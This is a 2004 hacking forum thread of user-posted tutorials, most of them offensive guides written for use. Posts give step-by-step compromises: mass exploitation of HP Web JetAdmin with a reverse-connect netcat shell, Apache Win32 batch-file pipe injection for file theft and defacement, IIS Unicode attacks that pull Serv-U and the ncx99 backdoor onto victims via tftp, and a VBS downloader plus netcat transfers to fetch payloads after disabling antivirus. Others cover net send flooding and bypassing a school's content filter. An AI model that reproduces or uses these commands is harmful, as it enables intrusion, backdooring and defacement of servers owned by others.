Government Security
Network Security Resources

Jump to content


security hacking tutorial
  • Please log in to reply
67 replies to this topic

#31 seeno



  • Members
  • 2 posts

Posted 29 April 2004 - 02:14 PM

For thoes who can't use there winmodems (Conexant chipsets).
did you install a Linux distro and found out you couldn't use your winmodem?
well, there's a solution for that now, go to Linuxant and download the right package for your kernel/modem (free version), install it and give it a try using kppp. kppp is a GUI version for thoes who want to connect quick and/or don't know how to configure pppd, your limited to 14.4Kbps data with the free version so i would recomend you to buy the full version.

#32 Spawn


    Private First Class

  • Members
  • 31 posts

Posted 02 May 2004 - 07:10 AM

You can Download a lot of programming tuts here : Take a look, its a nice one ;)

#33 JohnAcres


    Private First Class

  • Members
  • 21 posts

Posted 07 May 2004 - 02:14 PM

alright im gonna do a quick tutorial on how to hack and scan for hp web jetadmin.. the ways of my knowledge and experience if anyone has any suggestions feel free to post em cause right now the scanning/checking is fairly crude.

alright well ill start off with the scanning for HP Web JetAdmin. Sfind or scan500 whichever ur favorite scanner of that type is and choose a range and scan for port 8000... fairly simple right... so if u were using sfind ud do...

sfind -p 8000

once u have that scan take scanline or whatever other banner scanner u want to use and banner scan the ips on port 8000, for scanline it goes like this

sl -bhpt 8000 -f portscan.txt -o bannerscan.txt

now you have the banner results... you want to find all the banners that have HP Web JetAdmin in them and copy all the ips to another txt file. once you have this txt file we can use notepad to (hopefully u didn't scan multiple A class ranges or this trick is kinda hard) turn these ips into sort of a masshacker/autohacker. Go to replace put in the first number set in the range (example if i scanned to id put in 127.) with the period at the end in the find dialog box... in the replace box put plus the first number set with the peroid... so example ( i put 127. in the find dialog i put 127. in the replace with dialog box).

you should now have a file that looks like...

save and close the file... rename it to a .bat execute it in the folder with the exploit

it will go thru all the ips and try to hack em... once it gets to a windows box that it can hack it will ask you how u want to upload the files f for ftp or t tftp... chose ur prefence ive always done ftp cause i can't host a tftp server. itll ask you for the username/password for the ftp or tftp server. the ip, the file path, and the file you want uploaded... fill out all these with what you want... for the backdoor on this i HIGHLY recommend using a reverse connect shell because its not executed right away. open up ur netcat on the port that the victim is gonna connect back to and just wait for a while, theres no set time itll connect back to so just leave it open for a day or two.

easy as that... now for the more technical details about the exploit

the exploit is in perl so you can download activeperl its on the bottom of the perl2exe site i think but its fairly availble and just use the perl script which is much more stable and much faster.

note: i haven't read this over so sorry for the poory writing thats prolly in here... ill look it over eventually

#34 Logan



  • Sergeant Major
  • 1,596 posts

Posted 07 May 2004 - 05:09 PM

even though i'm in the speciallist category now, this tut isn't suppost to be too grand... most everyone knows about it.. understanding BINARY!

Binary is the lowest level, it is a bunch of switches of ON and OFF and computers show this with 1 (on) and 0 (off)
now, for a while i had no clue what they were talking about with powers of ten crap, so here's a different way to look at it.

Here's a number- 192 (which is an example of an IP 8 Binary section)
in Binary- 11000000
Let's explain this.
1- 0
2- 0
4- 0
8- 0
16- 0
32- 0
64- 1
128- 1
( 128 + 64 = 192 )

OK, so what can you see from that table thing?
  • In Binary, the highest bit is on the left, the lowest on the right.
  • The number's starting number is ONE
  • The numbers DOUBLE each time they give another diget
  • No number can be made 2 different ways
to elaborate on the last thing in the list- imagine the number... 2... OK? (let's not make this more complicated than it is).. well how would you do two when the only two numbers <= 2 are 1 and 2? you can't use 2 ones, you have to use one two.. simple if you think about it

Binary is a very simple concept, once you get to understand it... if you're just starting out learning binary, hope this helped you

#35 Borgon



  • Members
  • 15 posts

Posted 17 May 2004 - 09:04 PM


Can someone include more sql injection tutorials? I have been doing some research on this topic and all i find are a few papers on exploiting easy login.asp form vulnerabilities, but nothing like a real application blindly, and not knowing the database table structures etc.


#36 manu


    Master Sergeant

  • Members
  • 820 posts

Posted 18 May 2004 - 12:08 AM

You can Download a lot of programming tuts here : Take a look, its a nice one

Unfortunately I didnt get any Tuts from that PAGE u mentioned. Waste of time.

Manu :huh:

#37 Opal



  • Members
  • 10 posts

Posted 23 May 2004 - 03:26 PM

Vulnerability in Apache for Win32 batch file processing - Remote command

=> Vendor: Apache group

=> Product: Apache web server (Win32) - Running DOS batch files
Tested on:
- Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat
file which
enables this attack)

=> Severity: High, remote command execution and arbitrary file viewing.

=> CVE candidate: CAN-2002-0061
( )

=> Summary: Because of a the way Apache web server handles DOS batch scripts
it is possible to execute remote commands on the web server by using the
pipe ('|') character.

The Apache 2.0.x installation is shipped with the default script
which can be exploited, but it should be noted that ANY '.bat' or '.cmd'
will allow exploitation of this vulnerability.

=> Description: When a request for a DOS batch file (.bat or .cmd) is sent
to an Apache
web server, the server will spawn a shell interpreter (cmd.exe by default)
will run the script with the parameters sent to it by the user. Because no
proper validation is done on the input, it is possible to send a pipe
('|') with commands appended to it as parameters to the CGI script, and the
interpreter will execute them.

1.This vulnerability has been exploited on - Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat
file which enables this attack)

When a request for a DOS batch file (.bat or.cmd) is sent to an Apache
web server, the server will spawn a shell interpreter (cmd.exe by
default) and will run the script with the parameters sent to it by the
user. Because no proper validation is done on the input, it is possible
to send a pipe character ('|') with commands appended to it as
parameters to the CGI script, and the shell interpreter will execute

2.Find a webserver running Apache 1.3.23(Win) or Apache 2.0.28-BETA(Win)

(a)To view the httpd.conf file residing in the /conf directory of the
Apache installation, you must copy it into the virtual web root.

To do this, write in your browser:;httpd.conf

(b)To view the contents of the C:\ drive create in /htdocs a file containing
the directory listing of the drive.

To do this, write in your browser:\dir.txt

⌐To make your deface you will use the echo command.

To do this, write in your browser:;echo Defaced bY YOU+>>+..\htdocs\index.html

This will append the string "Defaced bY YOU" to the index.html file residing in
the virtual web root directory.

Thats how this vulnerability can be exploited...

#38 ShouiZen



  • Members
  • 201 posts

Posted 25 May 2004 - 07:51 AM

Yes it's good software the autotof_dameware_3.72_3.73
yeah man it's good job :D :lol: :)

#39 Opal



  • Members
  • 10 posts

Posted 01 June 2004 - 01:23 AM

The How-To Hack IIS Servers For Pubstros
Tutorial about Hacking using IIS exploits
This one goes for the people that ask for a tut to start hacking.
if u wanna know more research yourself

Pub Hacking Tutorial

The How-To Hack IIS Servers For Pubstros
March 20 ,2002


or Educational Use Only##############################################


Getting Started is simple... let me warn you that what your doing is illegal and dangerous. Now then
This tutorial tells you how to hack IIS servers and make them as a pub... and how to rehack someone
elses pub hahahahaha!

Now then the tools and knowledge you will need are as follows

Tools Required:

1. Serv-u Ftp Server 4.0 works just fine but versions 3.0 doesnt require an additional dll file
2. TFTPSuitePro2000 (h**p://
3. Your Brain with knowledge of the IIS Unicode Exploit or MSDAC Exploit
4. Internet Explorer
5. Other things to try

Ok Let Me Start By Saying This Is For “Education Purpouses” Only And I Take No Responsibility For What You Do

The Setup

Step 1: Install Serv-u AND download the already preconfigured ServuDaemon from me (recommended as i will be explaining from this)

The reason why i told you to download both is because the Servu Version 4 that you download has a admin program so you can
make your own ini file after you understand everything i have in mine.

Step 2: Install TFTPSuite (Durring Installation Pick SERVER)

TFTPSuitePro Setup Open TFTPSuitePro, When It Asks U To Register Hit Register Than Cancel.You Should Have Sumtin That Looks
Like This Hit System->Setup For Inbound Path File, Hit Browse And Pick The C:\FTP dir We Made, And Do The Same For
Outbound Then Hit Ok. Now then when its time to upload files TFTP SERVER MUST BE RUNNING

Step 3: Unzip the Zip/Rar where you will find some goodies to help you scan for IIS servers and find one to hack

Here you will find tons of little programs that will assist you in hacking your server.


Step 5: Start Making the Pub

Ok im assuming you have a host that you can maybe get away with uploading files to.. and i say this because some networks
are behind firewalls that dont allow TFTP to connect to outside host and estabish a connection. Thus even though
you can use the unicode exploit on it to view all the files still doesnt mean you can upload files to it..
PLus some host administrators make it so that you cant write to the HD... GOOD LUCk THERE

Starting To THE HACK


The Right Side, You Should Be At A Directory Listing In Internet Explorer.The Dir Should Look Like This :

h**p:// ir+c:\ <----- This line will vary

Directory of c:\

07/17/02 12:17a 1,000,000 ---=1Mb=---
05/03/02 08:57a 0 AUTOEXEC.BAT
05/03/02 08:54a 0 AUTOEXEC.CAM
06/01/01 09:09a 0 CONFIG.SYS
12/26/01 12:46p <DIR> Desktop
06/01/01 02:20p <DIR> I386
07/08/02 02:52p <DIR> intepub
06/01/01 02:49p <DIR> NIC
12/23/01 08:32p <DIR> NIMDA TO
12/23/01 08:32p <DIR> Nimda Tool
07/17/02 05:56p 65,634,304 pagefile.sys
01/04/02 04:31p <DIR> Program Files
07/17/02 12:14a <DIR> TEMP
06/05/01 05:01p <DIR> temptape
06/01/01 04:53p <DIR> Video
12/23/01 09:53p <DIR> Windows Update Setup Files
07/17/02 05:50p <DIR> WINNT
19 File 72,687,972 bytes
480,750,592 bytes free

Ok you get the idea of what your browser looks like because your experienced but you are clueless about this pub crap
Now then you will need to start and run TFTP SERVER making sure you arent running and firewall because it will block
your request.Now we will need to send the files through the TFTP Server to the host. And to do this you do something like

h**p:// :\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe

Now then you arent limited to just 1 dir to install this server to.. i like to hide mine in the c:\winnt\system but some people use the c:\intepub\scripts

h**p:// :\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe

So then you would copy the above line into the Internet Explorer And Hit Enter, Look At Your TFTPSuitePro Window
And u Should See Its Uploading A File. NOTE SOMETIMES you get an error msg just refresh the page or..copy into another window and try again
remember sometimes you get this msg because the host cant connect properly to you..

Repeat for the following files:

SFIND.exe -------> used to scan for more.. servers
KILL.EXE -------> used to kill a task very handy
TLIST.EXE -------> used to list all running processes or Task List
ncx99.exe -------> used to have as a backdoor remote trojan that runs on port 99
iis-scanner.EXE great for scanning servers
servudaemon.ini needed for servu


h**p:// -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\winnt\system\ServUDaemon.ini

h**p:// -i+%20**.***.**.**+GET+ServUDaemon.exe+c:\winnt\system\ServUDaemon.exe

h**p:// -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.ini
h**p:// -i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.exe

h**p:// -i+%20**.***.**.**+GET+TzoLibr.dll+c:\winnt\system\TzoLibr.dll

h**p:// -i+%20**.***.**.**+GET+ncx99.exe+c:\winnt\system\ncx99.exe

h**p:// -i+%20**.***.**.**+GET+bnc.cfg+c:\winnt\system\tlist.exe


h**p:// c:\winnt\system\ncx99.exe

h**p:// +c:\winnt\system\ncx99.exe

h**p://\nc x99.exe%20/h

After the file has been executed The Ftp Should Be Up!

Test It With The Server Ip/Port/L/p You Setup Back In Servu Ftp Settings.

If It Works You Now Have Complete Control Over The System!

Now then here is where the Serv U 4.0 comes in you may now use the admin program that comes with it so that you can

set up your server the way you want. You have Admin rights

Other Shit How To Use 'Kill' And 'Tlist' and 'ncx99.exe'

Tlist = Lists All Running Programs On Remote Machine
Kill = Kills Ones U Specicify
ncx99.exe = Dos like trojan

How to use ncx99

C:\>telnet host 99

Then once you connect to your server you will see dos like enviroment so find where you uploaded tlist.exe and execute it

c:\> cd winnt
c:\>winnt\ cd system

Tlist is good when you have ncx99.exe installed so its easier to just call it up

-2 Idle.exe
4 System.exe
840 smss.exe
948 csrss.exe
972 winlogon.exe NetDDE Agent
1016 services.exe
1028 lsass.exe
1216 svchost.exe
1364 svchost.exe
1500 svchost.exe
1636 svchost.exe
1820 spoolsv.exe
1952 CTSVCCDA.exe
1988 mdm.exe
2024 DUC20.exe Duc20
408 MsPMSPSv.exe
3024 svchost.exe
360 explorer.exe Program Manager
3496 ctfmon.exe CiceroUIWndFrame
3068 WinCinemaMgr.exe InterVideo WinCinema Manager
1124 evntsvc.exe Notification Wnd for RNAdmin
1568 msmsgs.exe DDE Server Window
2664 iis-scanner.exe Notification Window
2172 r_server.exe
3712 daemon.exe
2800 cmd.exe Command Prompt
3880 TLIST.exe
-2 _Total.exe

now then to kill it there are two ways i will show you the first is from within the nxc99.exe because its best

just look at the tlist.exe list and find the system process you want to kill

now from the same dir that you installed kill run kill and

for me it would be


now then lets say i wanted to close explorer.exe i look at the tlist and see that '360 explorer.exe' Program Manager

360 is the process id that you will use to close down Explorer.exe so you call it like this

c:\>winnt\system\kill.exe 360

do another tlist.exe and you will no longer see explorer.exe there

the other way to do this is to use the url

h**p:// +c:\winnt\system\kill.exe?number

where number is again from the tlist.exe

so to kill explorer.exe we do something like this

h**p:// +c:\winnt\system\kill.exe?360

and it should say killed.

#40 KuerbY


    Staff Sergeant

  • Members
  • 254 posts

Posted 01 June 2004 - 07:07 AM

fxp crap i hate it :(
anyway i think everybody in here knows about iis hacking...

#41 Apok^


    Private First Class

  • Members
  • 27 posts

Posted 02 June 2004 - 05:58 AM

K, it has been a while, but I can remember this

some fun stuff to do in a lab:

shutdown -s -m \\[computer] (shuts down computer)

shutdown -a -m \\[computer] (aborts shutdown)

open a .txt file

type in this EXACTLY
net send [username....blabla, type net send /? for more] "message"
goto a

rename the file to a .bat instead of .txt
it will net send them to death :D

#42 globey



  • Members
  • 189 posts

Posted 08 June 2004 - 02:06 PM

by diablohorn

*Tutorial on getting the stuff on a stro when the machine has got no TFTP or FTP.*
*Tutorial Written By: DiabloHorn *
*Comment: This is intended mostly for rehacking, sometimes for hacking new ones *
*Creditz: Kimatrix, *
*COMMENT: This is mostly intended to only download wget.exe with it dont try to *
*download big things like serv-u *


0) Opening Words
1) The Netcat Way
2) .vbs script
3) Greetz

* 0) Opening Words *
Hmm what shall I say this time?
O yeah I'm trying to improve my english hope you will read tut's of mine with perfect english on it
pretty impossible but I'll try.
Well about the tutorial you are about to read, this tutorial is ment for when you are on a machine
you've got a shell but when typing the command tftp or ftp to get the files on it , it returns:

"ftp" Command not recognized or some similar error.

if that error sounds familiar then this tutorial might be for you.
I say might because if telnet is also deactivated then well to bad.
Hope you all still awake so read on and get started.

* 1) The Netcat Way *

1) Purpose
2) Tools Needed
3) HowTo

1) Purpose

Using 2 netcat's to retrieve a file

2) Tools Needed

- a Shell
- 2 Netcat's
- File 2 Transfer

3) HowTo

Fire up netcat on your machine like this:

nc.exe -l -p 4455 -u -vvv < file.exe

When done fire up netcat on the hacked machine like this:

nc.exe -u host port > outputfile.exe

When this is done therewill be a connection but nothing will be sent until you send a charachter from
own machine to the hacked one so just type something "a" would be enough and hit enter.
Now the stupid part with this you have no idea how long it will take so I suggest you DON'T
transfer serv-u with this, but rather a thing like wget.exe and then just download the stuff from the web.
This is tested locally and remote with normal acces to the shell so just tweak it until it works for you.

* 2) .vbs script *

1) Purpose
2) Tools Needed
3) HowTo

1) Purpose

this is ment to make a .vbs executable script that downloads a file from the web.
similar to wget but doesn't need to be uploaded also works when tftp and ftp and net commands
are disabled.

2) Tools Needed

- a Shell
- a commandline editor
- if no commandline editor availible the ""echo" command

3) HowTo

first of all make shure any anti-virus is disabled because a .vbs file sometimes get caught
by antivirus programs.

First I'll discuss the commandline editor option
then I'll discuss the echo option

########Commandline editor option####################

firt of all go to the directory you want the file to be downloaded to in example:

cd c:\Recycler/

when done do this:

copy con get.vbs/

when this is done you can inmediatly start typping text so let's type the following things

Dim DataBin /
Set HTTPGET = CreateObject("Microsoft.XMLHTTP") /
HTTPGET.Open "GET", "", False /
DataBin = HTTPGET.ResponseBody /
Const adTypeBinary=1 /
Const adSaveCreateOverWrite=2 /
Dim SendBinary /
Set SendBinary = CreateObject("ADODB.Stream") /
SendBinary.Type = adTypeBinary /
SendBinary.Open /
SendBinary.Write DataBin /
SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite /

Things you MUST change in the above code:

HTTPGET.Open "GET", "", False /
Change that to the place where you're OWN .exe file is located /
SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite /
Change that to the name of the .exe file you want to have and it's location/

When done typing the above just save the file by pressing CTRL+Z when the file is saved
just execute it like a normal .exe and wait till the file is downloaded.

########ECHO option####################

echo Dim DataBin >c:\recycler\get.vbs /
echo Dim HTTPGET >>c:\recycler\get.vbs /
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\recycler\get.vbs /
echo HTTPGET.Open "GET", "", False >>c:\recycler\get.vbs /
echo HTTPGET.Send >>c:\recycler\get.vbs /
echo DataBin = HTTPGET.ResponseBody >>c:\recycler\get.vbs /
echo Const adTypeBinary=1 >>c:\recycler\get.vbs /
echo Const adSaveCreateOverWrite=2 >>c:\recycler\get.vbs /
echo Dim SendBinary >>c:\recycler\get.vbs /
echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\recycler\get.vbs /
echo SendBinary.Type = adTypeBinary >>c:\recycler\get.vbs /
echo SendBinary.Open >>c:\recycler\get.vbs /
echo SendBinary.Write DataBin >>c:\recycler\get.vbs /
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite >>c:\recycler\get.vbs /

Things you MUST change in the above code:

HTTPGET.Open "GET", "", False /
Change that to the place where you're OWN .exe file is located /
SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite /
Change that to the name of the .exe file you want to have and it's location/

When done just execute like normal .exe and wait till the file is downloaded.

* 3) Greetz *

To the wonderfull world of internet and Kimatrix for helping me on testing the netcat things.

Hack it all just don't break it all.

Also want to say thx to all the peeps on NFE who gave me a nice place to learn in a quick way
new things and help other peeps out with my knowlegde.

#43 wambari



  • Members
  • 7 posts

Posted 30 June 2004 - 03:28 AM

Bypass school web content filter:

Most of these run on the school proxy server,here's how to bypass,result,unlimited and unrestricted internet access,multimedia download,.exe's etc.

-Collect External Ip address of school's DNS server (nothing a little social engineering can't solve).
-Get the internal ip address of school proxy server (you can get this from the internet connection settings of your browser under proxy servers).

-Get admin priviledges on client (need this to change ip settings on machine)

-Edit the TCP/IP connection gateway of your LAN by getting into the advanced option and adding a default gateway,set this to the ip address of the proxy server obtained in step1 above.

-Under TCP/IP Properties again,set the Preffered DNS server to the external DNS ip obtained in Step1.

-Remove the proxy settings on the browser by selecting the 'directly connected to internet' option.

-Fire up the browser and surf!



#44 IcedOut3E



  • Members
  • 154 posts

Posted 03 September 2004 - 08:03 PM

Maybe just a quick addition to the bypassing school filter.

Depending on how good the schools proxy is, you can usually just use a free proxy based anonymous browsing site for any websites that block you out.

I know I did it when I was in school

My school used "Bess" proxy server.

#45 Vort3x



  • Members
  • 161 posts

Posted 04 September 2004 - 12:44 PM

This topic serves as a reference to Web multimedia programs.

Emoticon WebsitesAdobe Photoshop 6+ Tutorials (6, 7)Macromedia Fireworks MX TutorialsMacromedia Flash 5+ Tutorials (5, MX, MX 2K4)

Also tagged with one or more of these keywords: security, hacking, tutorial